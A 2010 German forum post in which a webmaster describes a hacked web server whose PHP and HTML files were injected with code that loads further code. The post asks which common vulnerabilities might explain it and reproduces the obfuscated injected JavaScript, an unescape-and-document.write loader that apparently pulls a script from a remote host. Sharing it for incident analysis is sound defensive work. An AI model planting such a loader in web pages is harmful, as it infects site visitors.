Webserver gehackt, Skripten raufgespielt
Geizhals Preisvergleich Impressum | Werbung
 
Geizhals » Forum » Security & Viren » Webserver gehackt, Skripten raufgespielt (5 Beiträge, 563 Mal gelesen) Top-100 | Fresh-100
Du bist nicht angemeldet. [ Login/Registrieren ]
^ Forum  Security & Viren  #6228933
Webserver gehackt, Skripten raufgespielt
kj.y
13.11.2010, 12:08:24
Folgendes Problem aktuell:
Ein Webserver wurde gehackt und in php und html Dateien automatisiert Code hinzugefügt, der dann etwas nachlädt, was dann wieder etwas nachlädt usw.
Sofern html im Quelltext vorhanden war gleich nach body beginn, sonst am Ende der Datei und formschön in html-body tags verpackt.

Es wurden höchstwahrscheinlich auch Dateien in htaccess geschützen Bereichen geändert (das ist leider nicht mehr ganz nachvollziehbar).

Meine Vermutung ist nun, dass irgendeine Sicherheitslücke (z.B. ein phpbb Forum ist darauf) oder schlecht ausprogrammierte Uploads dazu geführt haben.

Ja - die Frage wäre was denn aktuell so die Standard-Sicherheitslücken sind, die so etwas mehr oder weniger bekannterweise zur Folge haben.
Ich weiß, die Frage ist etwas mau, aber vielleicht kursiert ja gerade etwas.
Eine Vermutung ist, dass einfach mit google danach gesucht wurde und sich halt dann jene HP angeboten hat.
Wirklich interessant wäre auch ein Scan-Kit, der nach bekannten Lücken sucht,
bzw. Websiten die sich genau mit dem Thema (aktuell kursierendes, Sicherheit) befassen.

Sollte jemand eine VM haben, das ist der Code:



|script type{"text/javascript"|
var wGss98v0zDCHi { "uBdb915uBdb935"~
var qg2solLrupydN0 { "uBdb93cuBdb973uBdb963uBdb972u"~ 
var qg2solLrupydN1 { "Bdb969uBdb970uBdb974uBdb920uB"~ 
var qg2solLrupydN2 { "db974uBdb979uBdb970uBdb965uBd"~ 
var qg2solLrupydN3 { "b93duBdb922uBdb974uBdb965uBdb"~ 
var qg2solLrupydN4 { "978uBdb974uBdb92fuBdb96auBdb9"~ 
var qg2solLrupydN5 { "61uBdb976uBdb961uBdb973uBdb96"~ 
var qg2solLrupydN6 { "3uBdb972uBdb969uBdb970uBdb974"~ 
var qg2solLrupydN7 { "uBdb922uBdb920uBdb973uBdb972u"~ 
var qg2solLrupydN8 { "Bdb963uBdb93duBdb922uBdb968uB"~ 
var qg2solLrupydN9 { "db974uBdb974uBdb970uBdb93auBd"~ 
var qg2solLrupydN10 { "b92fuBdb92fuBdb963uBdb96fuBdb"~ 
var qg2solLrupydN11 { "975uBdb96euBdb974uBdb965uBdb9"~ 
var qg2solLrupydN12 { "72uBdb973uBdb974uBdb961uBdb97"~ 
var qg2solLrupydN13 { "4uBdb973uBdb92euBdb973uBdb965"~ 
var qg2solLrupydN14 { "uBdb972uBdb976uBdb965uBdb96du"~ 
var qg2solLrupydN15 { "Bdb970uBdb933uBdb92euBdb963uB"~ 
var qg2solLrupydN16 { "db96fuBdb96duBdb92fuBdb92fuBd"~ 
var qg2solLrupydN17 { "b96duBdb96cuBdb92euBdb970uBdb"~ 
var qg2solLrupydN18 { "968uBdb970uBdb922uBdb93euBdb9"~ 
var qg2solLrupydN19 { "20uBdb93cuBdb92fuBdb973uBdb96"~ 
var qg2solLrupydN20 { "3uBdb972uBdb969uBdb970uBdb974"~ 
var qg2solLrupydN21 { "uBdb93e"~ 
var ZPFlt1UYA1tfk { "Dh3Ln15uBdb935"~
var ERYCkoBwTvOcS { qg2solLrupydN0+qg2solLrupydN1+qg2solLrupydN2+qg2solLrupydN3+qg2solLrupydN4+qg2solLrupydN5+qg2solLrupydN6+qg2solLrupydN7+qg2solLrupydN8+qg2solLrupydN9+qg2solLrupydN10+qg2solLrupydN11+qg2solLrupydN12+qg2solLrupydN13+qg2solLrupydN14+qg2solLrupydN15+qg2solLrupydN16+qg2solLrupydN17+qg2solLrupydN18+qg2solLrupydN19+qg2solLrupydN20+qg2solLrupydN21~ 
CtnqKOXMGM9bE { ERYCkoBwTvOcS.replace(/uBdb9/g,"%")~
var iRDgo28MEsBPo { unescape~
var wGss98v0zDCHi { "AUx2i15Dh3Ln35"~
w9221 { this~
var NKCGnIAa0Vzgr{w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")]~
NKCGnIAa0Vzgr.write(iRDgo28MEsBPo(CtnqKOXMGM9bE))~
|/script|


Danke & schöne Grüße
Antworten PM Alle Chronologisch
 
Melden nicht möglich
.  Re: Webserver gehackt, Skripten raufgespielt  (kombipaket am 13.11.2010, 14:54:37)
.  Re: Webserver gehackt, Skripten raufgespielt  (mjy@geizhals.at am 14.11.2010, 17:57:53)
.  Re: Webserver gehackt, Skripten raufgespielt  (*patrick star* am 14.11.2010, 18:09:45)
 

Dieses Forum ist eine frei zugängliche Diskussionsplattform.
Der Betreiber übernimmt keine Verantwortung für den Inhalt der Beiträge und behält sich das Recht vor, Beiträge mit rechtswidrigem oder anstößigem Inhalt zu löschen.
Datenschutzerklärung